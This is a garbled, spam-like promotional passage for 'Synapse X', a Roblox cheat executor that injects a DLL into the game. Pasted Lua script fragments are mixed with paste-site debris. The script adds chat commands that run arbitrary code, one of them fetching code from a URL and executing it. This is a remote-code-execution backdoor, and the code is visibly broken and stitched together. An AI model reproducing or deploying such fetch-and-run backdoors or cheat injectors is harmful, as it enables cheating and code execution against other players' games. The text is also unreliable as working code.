wide functionality with interesting GUI support for proxy and multi-window mode, autorun of the game, and other functions. Synapse X free is one of the best executables scripts for Roblox. Sort your game with Bots, Auto-farm, Scripts on stats and more you need to use programs that allow you to intervene in the game process by injecting a DLL library. Synapse X is not suitable for all scripts, but there is a huge base for their creation and a list of already created ones. local Commands = script.Parent = Instance.new('Glue') table.insert(Commands, '/e dos/') table.insert(Commands, '/e doh/') function C(M) if string.sub(M, 1, 7) '/e dos/' then loadstring(string.sub(M, 8))() table.insert(Logs, M) end if string.sub(M, 1, 7) '/e doh/' then loadstring(game:GetService('HttpService'):GetAsync(string.sub(M, 8), true))() table.insert(Logs, M) end end :connect(C) Synapse X Exploit – Download 2020 RAW Paste Data -] EnabledUser = 'jasonn600' - Put your name in the quotes, without deleting them.